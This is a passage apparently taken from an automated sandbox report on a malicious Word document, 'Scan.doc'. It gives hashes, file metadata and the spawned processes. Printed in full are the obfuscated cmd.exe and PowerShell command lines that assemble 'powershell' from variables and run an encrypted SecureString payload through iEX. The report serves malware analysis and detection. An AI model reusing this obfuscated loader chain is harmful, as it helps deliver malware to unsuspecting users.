AxAGEAYgA0ADIAZQBjADQAZAAzAGUAOQAxAGUANABmADYAMgA2AGIANgBmADAAMQAwADMANgA3ADkAMAAzADMAZQA5ADgANgA1AGUAMABkADQANQA3AGQANAAzADMANABmAGQAOQA1AGQAOABiADgANQBiADAAZABiAGIAMQA5ADcAOAA4ADAAZQA4AGYAMAA4ADcAMgA2ADQAOQBiAGMAYQAwADQAZQAxADkAYwBiAGYANgA4ADEANQBiADMAMgAxADkAZQBiADQAZAAxADUAOQA5AGIANgA1AGYAMwBhAGIAZgA3ADgANQBiAGEAMQAzADMAYwA0ADkANwA1ADIAOAAzADkAZQBiADAAMwAwAGQAMQA4ADEAOABlADUANgAxADAAMgA2ADAAMgAwADcANQAwADYAZgBiAGQAMQBjADcANABiAGMAOAA4ADIANwAyAGUAZAA4AGUAMwA0AGQANAAxADEAMAA2ADcAMQA3ADAAMQBkADIANAAyADEANgAzAGIAMwA1ADMAZAA4ADMANABmAGQAMQBiAGIANwBmAGQAMgAzADUAMgA4AGEANwA1ADIAZgA2ADYAYwA3ADAAOAA4AGUANwA0ADcANwBjADUAMgBlAGUAZQBhADkANwA3ADcAZQBjAGUAMAA1ADYAMQBkAGYAMABmAGMAYwBhADYAMwA2ADkAOQBlADQANQBmAGMAZAAwADMAOABjAGEAMgAzADcANQAyADQAYQA3AGIAYQA4AGUAYgA5AGIANgBlADgAZABiAGYANwA2ADYANQAyAGYANQBmAGEAZgBmAGUAMwA4ADkAYwA4ADEAZQA0AGIAMQBjADgAOAA3ADYANgBiADEANABhADYAOAA4AGUAOABjADYAOAAzAGEANwA2ADAAMQBjADEAOABjADkAOQAyAGUAYwA0ADMAOQA4ADAAMAAwAGYAOABmADYAMQA4ADgAMAA5AGMAMgAxADMANgBmADAANwBmAGUANQAzAGEAYgA3ADEAYQBlAGYAZgA0ADEAMAAwADMANgA0ADMAOQAzADMAYQA0ADkANwBmADAAMABlAGUAMQBmADAANgAyADgANAA0ADUAOQBiADQAYQA1ADkANABiAGUAZAA1AGYAOQA3ADEANAA1AGYAYQBkADYAMABkAGIAMwBhAGEAMgA3AGMAZAA1ADUAOQA3ADAAMwAwAGIAOQA3ADkAMAAxADkAZAAxADgANwBlADAAOQBlADkAOQBmADMAZAA0ADUAOQA3ADQAMAA3AGMAYwA4ADIANgA5ADAAMgBmADgAYQAxAGEANgA2AGYAMwAzADAAZQAyAGYAMQBiADIANQA2ADIANQBmAGEAZABiADQAMAA5AGUAOQA1AGEAYgBhADAAOAAyADYANgAyAGEAZQBkAGUAZgBhADYAYQBkADAAMQAyADIANgAzAGEAZABiAGUANgAyADkAYgA3ADIAZAAzAGYAMwAyADAAMwBjAGMAYQBmAGYAMgBmAGUAMQBmAGUAMAA2AGMAZABlAGUAZgBkAGQANgAxAGIAMwAyADYANQA0ADgAOAA3ADEANgAwAGIANABhAGMANABkADEAZgBlAGIANABiAGYAMABkADAAOQBhADcAMABlAGQAYgAyAGQAMAAwAGIAOQAxADcAMgBlAGIANQAxADcAOAAyADQANQA4ADMAYgA5AGIAZAA4ADAAMgBiADgAYwBhAGYAMgAxADYAMQA4ADkAYwA5ADEANwBhADEANgA2ADcAYgBjADUAOAAxADUAYQBkAGMAYwAyADgAZQAxAGUAZQBiADQANgBhADUANABlAGQAYwA1ADMAZgA1ADcANAA1ADEAMQA1AGUAZgAyAGQAYgAzADUANgBmADUAYgAxADYANwAxADcANQA2AGIAMgA5AGYAMwA5ADQAMABmADkANgA1ADgAZQA4ADcAMgBkADMAYgAzAGUAOABiADUAOQBiADMAYgAzADMAYgBjADMAYgBjADMAYQAzAGQAOQA4ADUAOAA4ADgAMAAzADYAYwAyADUANgA3ADcAYQA3AGEANgAzAGUAMQBhADAAZABhAGMAZQBjAGYANQA5ADUAYwA0AGQAYQAyADEAZABiAGMAMQBiADcAMwA3ADYAYwAyADIANAA5AGEAMQAzAGYAZgAzADYANAA2AGIAMgBjAGYAZQBlADkAMQA3ADcAYwBmADgAZQA1ADIAYgA3ADQAZAA2ADgANQA4ADAAMwAxADMAYwBjADAAOQAxADAAOQAwAGMANwAxADkAOQA2ADkAMgBlAGMAZgA3AGMAMgBmADcANwA3ADYAOQAxADAAMAAzADkAMwAzADkAZgA1AGUAYgBkADUAOQA1ADAAYgA1ADQAOAA2AGQAMABhADMANAA3ADMANQA0ADAANwA0ADIANwAxADkAMgA1AGUANABhAGMAYgAyADQAYgA1AGIAYQAzADcAZgA1ADIAOABkAGIAYgA0ADEAOAA3AGUAZgBmAGYAYgAyADQAYwA0ADUAZQBjADgAYwA0ADUAOABjADcAYwBkADMAZgA5ADcAZgBlADcANAAyADIAZgA4AGQANQA4AGUAOQBhADIAOAA0ADgANgA0ADIAMQA2AGQAYwAwAGIAMwA0AGQAZgBlAGUAYwBlAGUAYQAyAGQAZQA2ADUAZgA1ADcANAAyAGUANwAwADYANgA5ADYANwBkAGMAZAAzAGYANQBjADUAMABhADMAMQBkADYAMwAyADMAYwBiADAAMQBiAGYAYgA3ADMAYQA2AGMANAA1AGEAMQAyADgANQA5AGUAMQA4ADYAOABlADkAYwA1ADMAMwA2ADIAMQA1ADIAYwAxAGYAZQA2ADYAZABlAGEAMAA1AGEAYgAzAGUAZAA3AGYAYgBkAGIANAAwAGYAZABmAGMAZAAzADgAYgAxADEAMgA4AGIAYwA1ADMAMgA5AGQANQAyAGUAMQA2ADAAMwA3AGQAMgBmAGYAOABiAGIAYQA2ADcAMwAzADAAZAAxADEAZgAxADgAOQBhAGIAZgBlADkAYwAwADIAMQA2ADcAMgA5ADkANQBhADcAYgA4ADUAZABhADkAMAA4ADkAOQA0ADUAOQBmADcAMgA3ADMAYwAzADIANQBiADMAZABlAGQANAA5ADgAMABmAGYAZQBiAGYANwAzAGUAZABhAGMAMgA1AGEAYgA1ADMAOAA1ADUAYwAyAGIAMwA3ADIANwA5ADEANAA1ADIAOAAyAGYAOAA5ADgAMQBhADEAYgAzADMANQBmADAAOQAwADMAZgAxAGIAZAA2ADQAYQA4ADIANQBkADMAZgBlADgAZgBlADQANAA4ADMAZQAyADQAMQA1ADIAYQBiAGMANgA4ADQAYwBhADkAZABmADEAOAAxADEAYwAzADQAMgA4ADcAOAAwADAAOAA1ADQAMAA2ADEAYQBjAGUAYwBjADMAZgA2ADkANQA2ADIAYQBlADIAZAAwADMANQA0ADYAYwA3ADIAMwA1AGYANABhADYAOQBmADIAYQBhADUAMgBiADgAZABmADgAYQA2ADQAMwAxAGQAMAA3ADYAMgAxADEAYgBiADUAYQA1AGYAOAAzADQANwAwADUAZgBiAGYANQBhADEAMABlADIAYwBmADEAMwA2ADAANQAxADAAMQBmAGQAZAAxADYANwBiADIAMQBlADIAYQAyAGIAYQBiAGIAMAA2ADIAYgA1ADIANwBmAGUAYgA4ADkANgA4ADEAYgBkAGQANAAxADMAMABhAGMAOABiAGYAMwAxAGMAZQBiADkAMgBhADEAOQBhADAAZQBmAGMAOQA2AGEAZgAwAGYANQBkAGMAYQA0AGYANgAwAGMAYgA0AGMAMwBlAGIANwBmADQAMAA2ADAANgBlADYAOQBjADUAYQA2ADgAMgA5ADUAYwBmADAAYwA5ADIAYwA0ADcAYwA4ADYAOQBlADEAMgAxAGEAZAAxAGQANwA4AGQAYgAwAGIAMwBkADQAYgA3ADUAZAAwADcAYQA3ADAAYQAyADYAOAA5AGMAYgBiAGYAMwA2AGUAYwAzADIAZQA2ADIAMgA3AGQAYwAyAGEAOQAyADcANwAyADUAYQA5ADkAYwBkADgANgBlADEANAA3ADUAYQA4ADgAYQA4AGUAMgBiAGMAOABkAGUAZQAzADUAMgAzADEANwA1ADAAOABmADcAMQAwAGUAZgA3AGMAMgA2AGYAYgA5AGQAOAA2ADkAMQBjAGMAZAAyADIAMgBiADcAMAAzADMANQA4ADgAOABkAGMAOAAxADQAZABhADQANQA3ADAAZgBhADkANwAzAGUAMQA3AGEANAAzADgAOQA0ADUAMgAwAGUAOQBhADAANwA1AGYAMAAzADcAMABjAGUAMgBjADcAMQBmADUAMwBhADIAZgAwAGYAOABiAGIAMABlAGIAYgBjADMAOQBlADQANwA3AGEAZgA2AGQAMQA3AGUAZQBmADQAYQA1AGMAMQBkADcAYgA4ADEANwAwADIANgAyAGMANwA0AGEAYgAyADIAYgBkADYAZQBlADAAYQA2ADEAZgA5AGMANQA3AGMAMgBlADQANAA2ADkAOAAxADgANgBlADAAMgAwADgAOQA0ADEAOQBhADYAMQA2AA==' |ConVerTTO-secuREStrING -KEy (146..169)) ))))" on 2018-2-28.11:17:29.463, "powershell "iEX(( [RuNTime.InteropsErviCEs.maRsHaL]::PTrTOsTRinGAUto( [rUNtImE.iNTERoPSERVIceS.marsHAL]::SecUReStriNGTOBSTR($('76492d1116743f0423413b16050a5345MgB8AGUAQgBpAFgAawBzAGMATgBrAEgAQgBiAE4AUAB2AFUATgBPAHkAMQBuAGcAPQA9AHwAZABhAGQAMgA1ADUAMwBjAGIAMwA0ADEANABlAGQAZQA4ADEAZAA3ADIAMAA3ADYAYgA5ADcAZQA5ADgAYgA4ADMAMgAwAGEANABiAGIAZQBiADgAOAA3AGQAMgAyAGUAOQA4AGEAZABlADcAYQBlADQAYQA5AGYAZABlADQAMwBhAGYAMgAyADcANgAxADAAYgA5ADcAYgA1ADIAOQBmAGQAZQA3ADIAZABiADAAYwA5ADkAOABiAGQAMQBlADEAMgBmADkANABjADkAMgAxADAAOAA1ADkAMwBjADcAZgBlAGIAZAA4AGMAZgA2AGQAZQBiAGMANwBmADYANQA0ADIANgBmAGIANwA2ADYAZAAyADkAMQAwADUAZQA0ADMAMgA1AGIAOQBiAGEAYgA4ADgANgA3ADQAMAAzADYAYgA3AGEANwA3ADUANQA5AGUANwAxAGIAMQAyAGMAMAA0AGMAZgA4AGMANAA0AGMAYQA5ADYAYwA5AGYANQAzADMAMAA3ADQAMAA5AGMAMgA1ADUAMQAxAGEAYgA0ADIAZQBjADQAZAAzAGUAOQAxAGUANABmADYAMgA2AGIANgBmADAAMQAwADMANgA3ADkAMAAzADMAZQA5ADgANgA1AGUAMABkADQANQA3AGQANAAzADMANABmAGQAOQA1AGQAOABiADgANQBiADAAZABiAGIAMQA5ADcAOAA4ADAAZQA4AGYAMAA4ADcAMgA2ADQAOQBiAGMAYQAwADQAZQAxADkAYwBiAGYANgA4ADEANQBiADMAMgAxADkAZQBiADQAZAAxADUAOQA5AGIANgA1AGYAMwBhAGIAZgA3ADgANQBiAGEAMQAzADMAYwA0ADkANwA1ADIAOAAzADkAZQBiADAAMwAwAGQAMQA4ADEAOABlADUANgAxADAAMgA2ADAAMgAwADcANQAwADYAZgBiAGQAMQBjADcANABiAGMAOAA4ADIANwAyAGUAZAA4AGUAMwA0AGQANAAxADEAMAA2ADcAMQA3ADAAMQBkADIANAAyADEANgAzAGIAMwA1ADMAZAA4ADMANABmAGQAMQBiAGIANwBmAGQAMgAzADUAMgA4AGEANwA1ADIAZgA2ADYAYwA3ADAAOAA4AGUANwA0ADcANwBjADUAMgBlAGUAZQBhADkANwA3ADcAZQBjAGUAMAA1ADYAMQBkAGYAMABmAGMAYwBhADYAMwA2ADkAOQBlADQANQBmAGMAZAAwADMAOABjAGEAMgAzADcANQAyADQAYQA3AGIAYQA4AGUAYgA5AGIANgBlADgAZABiAGYANwA2ADYANQAyAGYANQBmAGEAZgBmAGUAMwA4ADkAYwA4ADEAZQA0AGIAMQBjADgAOAA3ADYANgBiADEANABhADYAOAA4AGUAOABjADYAOAAzAGEANwA2ADAAMQBjADEAOABjADkAOQAyAGUAYwA0ADMAOQA4ADAAMAAwAGYAOABmADYAMQA4ADgAMAA5AGMAMgAxADMANgBmADAANwBmAGUANQAzAGEAYgA3ADEAYQBlAGYAZgA0ADEAMAAwADMANgA0ADMAOQAzADMAYQA0ADkANwBmADAAMABlAGUAMQBmADAANgAyADgANAA0ADUAOQBiADQAYQA1ADkANABiAGUAZAA1AGYAOQA3ADEANAA1AGYAYQBkADYAMABkAGIAMwBhAGEAMgA3AGMAZAA1ADUAOQA3ADAAMwAwAGIAOQA3ADkAMAAxADkAZAAxADgANwBlADAAOQBlADkAOQBmADMAZAA0ADUAOQA3ADQAMAA3AGMAYwA4ADIANgA5ADAAMgBmADgAYQAxAGEANgA2AGYAMwAzADAAZQAyAGYAMQBiADIANQA2ADIANQBmAGEAZABiADQAMAA5AGUAOQA1AGEAYgBhADAAOAAyADYANgAyAGEAZQBkAGUAZgBhADYAYQBkADAAMQAyADIANgAzAGEAZABiAGUANgAyADkAYgA3ADIAZAAzAGYAMwAyADAAMwBjAGMAYQBmAGYAMgBmAGUAMQBmAGUAMAA2AGMAZABlAGUAZgBkAGQANgAxAGIAMwAyADYANQA0ADgAOAA3ADEANgAwAGIANABhAGMANABkADEAZgBlAGIANABiAGYAMABkADAAOQBhADcAMABlAGQAYgAyAGQAMAAwAGIAOQAxADcAMgBlAGIANQAxADcAOAAyADQANQA4ADMAYgA5AGIAZAA4ADAAMgBiADgAYwBhAGYAMgAxADYAMQA4ADkAYwA5ADEANwBhADEANgA2ADcAYgBjADUAOAAxADUAYQBkAGMAYwAyADgAZQAxAGUAZQBiADQANgBhADUANABlAGQAYwA1ADMAZgA1ADcANAA1ADEAMQA1AGUAZgAyAGQAYgAzADUANgBmADUAYgAxADYANwAxADcANQA2AGIAMgA5AGYAMwA5ADQAMABmADkANgA1ADgAZQA4ADcAMgBkADMAYgAzAGUAOABiADUAOQBiADMAYgAzADMAYgBjADMAYgBjADMAYQAzAGQAOQA4ADUAOAA4ADgAMAAzADYAYwAyADUANgA3ADcAYQA3AGEANgAzAGUAMQBhADAAZABhAGMAZQBjAGYANQA5ADUAYwA0AGQAYQAyADEAZABiAGMAMQBiADcAMwA3ADYAYwAyADIANAA5AGEAMQAzAGYAZgAzADYANAA2AGIAMgBjAGYAZQBlADkAMQA3ADcAYwBmADgAZQA1ADIAYgA3ADQAZAA2ADgANQA4ADAAMwAxADMAYwBjADAAOQAxADAAOQAwAGMANwAxADkAOQA2ADkAMgBlAGMAZgA3AGMAMgBmADcANwA3ADYAOQAxADAAMAAzADkAMwAzADkAZgA1AGUAYgBkADUAOQA1ADAAYgA1ADQAOAA2AGQAMABhADMANAA3ADMANQA0ADAANwA0ADIANwAxADkAMgA1AGUANABhAGMAYgAyADQAYgA1AGIAYQAzADcAZgA1ADIAOABkAGIAYgA0ADEAOAA3AGUAZgBmAGYAYgAyADQAYwA0ADUAZQBjADgAYwA0ADUAOABjADcAYwBkADMAZgA5ADcAZgBlADcANAAyADIAZgA4AGQANQA4AGUAOQBhADIAOAA0ADgANgA0ADIAMQA2AGQAYwAwAGIAMwA0AGQAZgBlAGUAYwBlAGUAYQAyAGQAZQA2ADUAZgA1ADcANAAyAGUANwAwADYANgA5ADYANwBkAGMAZAAzAGYANQBjADUAMABhADMAMQBkADYAMwAyADMAYwBiADAAMQBiAGYAYgA3ADMAYQA2AGMANAA1AGEAMQAyADgANQA5AGUAMQA4ADYAOABlADkAYwA1ADMAMwA2ADIAMQA1ADIAYwAxAGYAZQA2ADYAZABlAGEAMAA1AGEAYgAzAGUAZAA3AGYAYgBkAGIANAAwAGYAZABmAGMAZAAzADgAYgAxADEAMgA4AGIAYwA1ADMAMgA5AGQANQAyAGUAMQA2ADAAMwA3AGQAMgBmAGYAOABiAGIAYQA2ADcAMwAzADAAZAAxADEAZgAxADgAOQBhAGIAZgBlADkAYwAwADIAMQA2ADcAMgA5ADkANQBhADcAYgA4ADUAZABhADkAMAA4ADkAOQA0ADUAOQBmADcAMgA3ADMAYwAzADIANQBiADMAZABlAGQANAA5ADgAMABmAGYAZQBiAGYANwAzAGUAZABhAGMAMgA1AGEAYgA1ADMAOAA1ADUAYwAyAGIAMwA3ADIANwA5ADEANAA1ADIAOAAyAGYAOAA5ADgAMQBhADEAYgAzADMANQBmADAAOQAwADMAZgAxAGIAZAA2ADQAYQA4ADIANQBkADMAZgBlADgAZgBlADQANAA4ADMAZQAyADQAMQA1ADIAYQBiAGMANgA4ADQAYwBhADkAZABmADEAOAAxADEAYwAzADQAMgA4ADcAOAAwADAAOAA1ADQAMAA2ADEAYQBjAGUAYwBjADMAZgA2ADkANQA2ADIAYQBlADIAZAAwADMANQA0ADYAYwA3ADIAMwA1AGYANABhADYAOQBmADIAYQBhADUAMgBiADgAZABmADgAYQA2ADQAMwAxAGQAMAA3ADYAMgAxADEAYgBiADUAYQA1AGYAOAAzADQANwAwADUAZgBiAGYANQBhADEAMABlADIAYwBmADEAMwA2ADAANQAxADAAMQBmAGQAZAAxADYANwBiADIAMQBlADIAYQAyAGIAYQBiAGIAMAA2ADIAYgA1ADIANwBmAGUAYgA4ADkANgA4ADEAYgBkAGQANAAxADMAMABhAGMAOABiAGYAMwAxAGMAZQBiADkAMgBhADEAOQBhADAAZQBmAGMAOQA2AGEAZgAwAGYANQBkAGMAYQA0AGYANgAwAGMAYgA0AGMAMwBlAGIANwBmADQAMAA2ADAANgBlADYAOQBjADUAYQA2ADgAMgA5ADUAYwBmADAAYwA5ADIAYwA0ADcAYwA4ADYAOQBlADEAMgAxAGEAZAAxAGQANwA4AGQAYgAwAGIAMwBkADQAYgA3ADUAZAAwADcAYQA3ADAAYQAyADYAOAA5AGMAYgBiAGYAMwA2AGUAYwAzADIAZQA2ADIAMgA3AGQAYwAyAGEAOQAyADcANwAyADUAYQA5ADkAYwBkADgANgBlADEANAA3ADUAYQA4ADgAYQA4AGUAMgBiAGMAOABkAGUAZQAzADUAMgAzADEANwA1ADAAOABmADcAMQAwAGUAZgA3AGMAMgA2AGYAYgA5AGQAOAA2ADkAMQBjAGMAZAAyADIAMgBiADcAMAAzADMANQA4ADgAOABkAGMAOAAxADQAZABhADQANQA3ADAAZgBhADkANwAzAGUAMQA3AGEANAAzADgAOQA0ADUAMgAwAGUAOQBhADAANwA1AGYAMAAzADcAMABjAGUAMgBjADcAMQBmADUAMwBhADIAZgAwAGYAOABiAGIAMABlAGIAYgBjADMAOQBlADQANwA3AGEAZgA2AGQAMQA3AGUAZQBmADQAYQA1AGMAMQBkADcAYgA4ADEANwAwADIANgAyAGMANwA0AGEAYgAyADIAYgBkADYAZQBlADAAYQA2ADEAZgA5AGMANQA3AGMAMgBlADQANAA2ADkAOAAxADgANgBlADAAMgAwADgAOQA0ADEAOQBhADYAMQA2AA==' |ConVerTTO-secuREStrING -KEy (146..169)) ))))" on 2018-2-28.11:17:29.667
- source
- Monitored Target
- relevance
- 10/10
-
Installs hooks/patches the running process
File Details
Scan.doc
- Filename
- Scan.doc
- Size
- 221KiB (226304 bytes)
- Type
- doc office
- Description
- Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: nkqzhqbX, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Feb 27 05:23:00 2018, Last Saved Time/Date: Tue Feb 27 05:23:00 2018, Number of Pages: 1, Number of Words: 2, Number of Characters: 18, Security: 0
- Architecture
- WINDOWS
- SHA256
- 129168ef97cd243be323636ec3da04a59630e8eaa317549cc0e69445776447a6
- MD5
- d7ffedbfbfb2e8ea4807066577700b2a
- SHA1
- 05c90b961124c265d60114df7877fc9851b2634c
Classification (TrID)
- 54.2% (.DOC) Microsoft Word document
- 32.2% (.DOC) Microsoft Word document (old ver.)
- 13.5% (.) Generic OLE2 / Multistream Compound File
Screenshots
Loading content, please wait...
Hybrid Analysis
Tip: Click an analysed process below to view more details.
Analysed 5 processes in total (System Resource Monitor).
-
WINWORD.EXE
/n "C:\129168ef97cd243be323636ec3da04a59630e8eaa317549cc0e69445776447a6.doc"
(PID: 3592)
-
cmd.exe
cmd jTEAdZpiDaiYz qjMfFiOJizKUzshGiIowLoWFqV KkWYSZzkWIXn & %C^om^S^pEc% %C^om^S^pEc% /V /c set %btHkJMzDjjiWVZK%=WYrzozjmBIwYc&&set %var1%=p&&set %var2%=ow&&set %ArQWcsLIfSRKwwT%=DWcTblEVs&&set %var7%=!%var1%!&&set %sdJUjBQbairSAth%=hrFapszPTzlTFB&&set %var3%=er&&set %var8%=!%var2%!&&set %var4%=s&&set %PnudkPBnvRAjVPb%=DdvUuuz&&set %var5%=he&&set %var6%=ll&&!%var7%!!%var8%!!%var3%!!%var4%!!%var5%!!%var6%! "iEX(( [RuNTime.InteropsErviCEs.maRsHaL]::PTrTOsTRinGAUto( [rUNtImE.iNTERoPSERVIceS.marsHAL]::SecUReStriNGTOBSTR($('76492d1116743f0423413b16050a5345MgB8AGUAQgBpAFgAawBzAGMATgBrAEgAQgBiAE4AUAB2AFUATgBPAHkAMQBuAGcAPQA9AHwAZABhAGQAMgA1ADUAMwBjAGIAMwA0ADEANABlAGQAZQA4ADEAZAA3ADIAMAA3ADYAYgA5ADcAZQA5ADgAYgA4ADMAMgAwAGEANABiAGIAZQBiADgAOAA3AGQAMgAyAGUAOQA4AGEAZABlADcAYQBlADQAYQA5AGYAZABlADQAMwBhAGYAMgAyADcANgAxADAAYgA5ADcAYgA1ADIAOQBmAGQAZQA3ADIAZABiADAAYwA5ADkAOABiAGQAMQBlADEAMgBmADkANABjADkAMgAxADAAOAA1ADkAMwBjADcAZgBlAGIAZAA4AGMAZgA2AGQAZQBiAGMANwBmADYANQA0ADIANgBmAGIANwA2ADYAZAAyADkAMQAwADUAZQA0ADMAMgA1AGIAOQBiAGEAYgA4ADgANgA3ADQAMAAzADYAYgA3AGEANwA3ADUANQA5AGUANwAxAGIAMQAyAGMAMAA0AGMAZgA4AGMANAA0AGMAYQA5ADYAYwA5AGYANQAzADMAMAA3ADQAMAA5AGMAMgA1ADUAMQAxAGEAYgA0ADIAZQBjADQAZAAzAGUAOQAxAGUANABmADYAMgA2AGIANgBmADAAMQAwADMANgA3ADkAMAAzADMAZQA5ADgANgA1AGUAMABkADQANQA3AGQANAAzADMANABmAGQAOQA1AGQAOABiADgANQBiADAAZABiAGIAMQA5ADcAOAA4ADAAZQA4AGYAMAA4ADcAMgA2ADQAOQBiAGMAYQAwADQAZQAxADkAYwBiAGYANgA4ADEANQBiADMAMgAxADkAZQBiADQAZAAxADUAOQA5AGIANgA1AGYAMwBhAGIAZgA3ADgANQBiAGEAMQAzADMAYwA0ADkANwA1ADIAOAAzADkAZQBiADAAMwAwAGQAMQA4ADEAOABlADUANgAxADAAMgA2ADAAMgAwADcANQAwADYAZgBiAGQAMQBjADcANABiAGMAOAA4ADIANwAyAGUAZAA4AGUAMwA0AGQANAAxADEAMAA2ADcAMQA3ADAAMQBkADIANAAyADEANgAzAGIAMwA1ADMAZAA4ADMANABmAGQAMQBiAGIANwBmAGQAMgAzADUAMgA4AGEANwA1ADIAZgA2ADYAYwA3ADAAOAA4AGUANwA0ADcANwBjADUAMgBlAGUAZQBhADkANwA3ADcAZQBjAGUAMAA1ADYAMQBkAGYAMABmAGMAYwBhADYAMwA2ADkAOQBlADQANQBmAGMAZAAwADMAOABjAGEAMgAzADcANQAyADQAYQA3AGIAYQA4AGUAYgA5AGIANgBlADgAZABiAGYANwA2ADYANQAyAGYANQBmAGEAZgBmAGUAMwA4ADkAYwA4ADEAZQA0AGIAMQBjADgAOAA3ADYANgBiADEANABhADYAOAA4AGUAOABjADYAOAAzAGEANwA2ADAAMQBjADEAOABjADkAOQAyAGUAYwA0ADMAOQA4ADAAMAAwAGYAOABmADYAMQA4ADgAMAA5AGMAMgAxADMANgBmADAANwBmAGUANQAzAGEAYgA3ADEAYQBlAGYAZgA0ADEAMAAwADMANgA0ADMAOQAzADMAYQA0ADkANwBmADAAMABlAGUAMQBmADAANgAyADgANAA0ADUAOQBiADQAYQA1ADkANABiAGUAZAA1AGYAOQA3ADEANAA1AGYAYQBkADYAMABkAGIAMwBhAGEAMgA3AGMAZAA1ADUAOQA3ADAAMwAwAGIAOQA3ADkAMAAxADkAZAAxADgANwBlADAAOQBlADkAOQBmADMAZAA0ADUAOQA3ADQAMAA3AGMAYwA4ADIANgA5ADAAMgBmADgAYQAxAGEANgA2AGYAMwAzADAAZQAyAGYAMQBiADIANQA2ADIANQBmAGEAZABiADQAMAA5AGUAOQA1AGEAYgBhADAAOAAyADYANgAyAGEAZQBkAGUAZgBhADYAYQBkADAAMQAyADIANgAzAGEAZABiAGUANgAyADkAYgA3ADIAZAAzAGYAMwAyADAAMwBjAGMAYQBmAGYAMgBmAGUAMQBmAGUAMAA2AGMAZABlAGUAZgBkAGQANgAxAGIAMwAyADYANQA0ADgAOAA3ADEANgAwAGIANABhAGMANABkADEAZgBlAGIANABiAGYAMABkADAAOQBhADcAMABlAGQAYgAyAGQAMAAwAGIAOQAxADcAMgBlAGIANQAxADcAOAAyADQANQA4ADMAYgA5AGIAZAA4ADAAMgBiADgAYwBhAGYAMgAxADYAMQA4ADkAYwA5ADEANwBhADEANgA2ADcAYgBjADUAOAAxADUAYQBkAGMAYwAyADgAZQAxAGUAZQBiADQANgBhADUANABlAGQAYwA1ADMAZgA1ADcANAA1ADEAMQA1AGUAZgAyAGQAYgAzADUANgBmADUAYgAxADYANwAxADcANQA2AGIAMgA5AGYAMwA5ADQAMABmADkANgA1ADgAZQA4ADcAMgBkADMAYgAzAGUAOABiADUAOQBiADMAYgAzADMAYgBjADMAYgBjADMAYQAzAGQAOQA4ADUAOAA4ADgAMAAzADYAYwAyADUANgA3ADcAYQA3AGEANgAzAGUAMQBhADAAZABhAGMAZQBjAGYANQA5ADUAYwA0AGQAYQAyADEAZABiAGMAMQBiADcAMwA3ADYAYwAyADIANAA5AGEAMQAzAGYAZgAzADYANAA2AGIAMgBjAGYAZQBlADkAMQA3ADcAYwBmADgAZQA1ADIAYgA3ADQAZAA2ADgANQA4ADAAMwAxADMAYwBjADAAOQAxADAAOQAwAGMANwAxADkAOQA2ADkAMgBlAGMAZgA3AGMAMgBmADcANwA3ADYAOQAxADAAMAAzADkAMwAzADkAZgA1AGUAYgBkADUAOQA1ADAAYgA1ADQAOAA2AGQAMABhADMANAA3ADMANQA0ADAANwA0ADIANwAxADkAMgA1AGUANABhAGMAYgAyADQAYgA1AGIAYQAzADcAZgA1ADIAOABkAGIAYgA0ADEAOAA3AGUAZgBmAGYAYgAyADQAYwA0ADUAZQBjADgAYwA0ADUAOABjADcAYwBkADMAZgA5ADcAZgBlADcANAAyADIAZgA4AGQANQA4AGUAOQBhADIAOAA0ADgANgA0ADIAMQA2AGQAYwAwAGIAMwA0AGQAZgBlAGUAYwBlAGUAYQAyAGQAZQA2ADUAZgA1ADcANAAyAGUANwAwADYANgA5ADYANwBkAGMAZAAzAGYANQBjADUAMABhADMAMQBkADYAMwAyADMAYwBiADAAMQBiAGYAYgA3ADMAYQA2AGMANAA1AGEAMQAyADgANQA5AGUAMQA4ADYAOABlADkAYwA1ADMAMwA2ADIAMQA1ADIAYwAxAGYAZQA2ADYAZABlAGEAMAA1AGEAYgAzAGUAZAA3AGYAYgBkAGIANAAwAGYAZABmAGMAZAAzADgAYgAxADEAMgA4AGIAYwA1ADMAMgA5AGQANQAyAGUAMQA2ADAAMwA3AGQAMgBmAGYAOABiAGIAYQA2ADcAMwAzADAAZAAxADEAZgAxADgAOQBhAGIAZgBlADkAYwAwADIAMQA2ADcAMgA5ADkANQBhADcAYgA4ADUAZABhADkAMAA4ADkAOQA0ADUAOQBmADcAMgA3ADMAYwAzADIANQBiADMAZABlAGQANAA5ADgAMABmAGYAZQBiAGYANwAzAGUAZABhAGMAMgA1AGEAYgA1ADMAOAA1ADUAYwAyAGIAMwA3ADIANwA5ADEANAA1ADIAOAAyAGYAOAA5ADgAMQBhADEAYgAzADMANQBmADAAOQAwADMAZgAxAGIAZAA2ADQAYQA4ADIANQBkADMAZgBlADgAZgBlADQANAA4ADMAZQAyADQAMQA1ADIAYQBiAGMANgA4ADQAYwBhADkAZABmADEAOAAxADEAYwAzADQAMgA4ADcAOAAwADAAOAA1ADQAMAA2ADEAYQBjAGUAYwBjADMAZgA2ADkANQA2ADIAYQBlADIAZAAwADMANQA0ADYAYwA3ADIAMwA1AGYANABhADYAOQBmADIAYQBhADUAMgBiADgAZABmADgAYQA2ADQAMwAxAGQAMAA3ADYAMgAxADEAYgBiADUAYQA1AGYAOAAzADQANwAwADUAZgBiAGYANQBhADEAMABlADIAYwBmADEAMwA2ADAANQAxADAAMQBmAGQAZAAxADYANwBiADIAMQBlADIAYQAyAGIAYQBiAGIAMAA2ADIAYgA1ADIANwBmAGUAYgA4ADkANgA4ADEAYgBkAGQANAAxADMAMABhAGMAOABiAGYAMwAxAGMAZQBiADkAMgBhADEAOQBhADAAZQBmAGMAOQA2AGEAZgAwAGYANQBkAGMAYQA0AGYANgAwAGMAYgA0AGMAMwBlAGIANwBmADQAMAA2ADAANgBlADYAOQBjADUAYQA2ADgAMgA5ADUAYwBmADAAYwA5ADIAYwA0ADcAYwA4ADYAOQBlADEAMgAxAGEAZAAxAGQANwA4AGQAYgAwAGIAMwBkADQAYgA3ADUAZAAwADcAYQA3ADAAYQAyADYAOAA5AGMAYgBiAGYAMwA2AGUAYwAzADIAZQA2ADIAMgA3AGQAYwAyAGEAOQAyADcANwAyADUAYQA5ADkAYwBkADgANgBlADEANAA3ADUAYQA4ADgAYQA4AGUAMgBiAGMAOABkAGUAZQAzADUAMgAzADEANwA1ADAAOABmADcAMQAwAGUAZgA3AGMAMgA2AGYAYgA5AGQAOAA2ADkAMQBjAGMAZAAyADIAMgBiADcAMAAzADMANQA4ADgAOABkAGMAOAAxADQAZABhADQANQA3ADAAZgBhADkANwAzAGUAMQA3AGEANAAzADgAOQA0ADUAMgAwAGUAOQBhADAANwA1AGYAMAAzADcAMABjAGUAMgBjADcAMQBmADUAMwBhADIAZgAwAGYAOABiAGIAMABlAGIAYgBjADMAOQBlADQANwA3AGEAZgA2AGQAM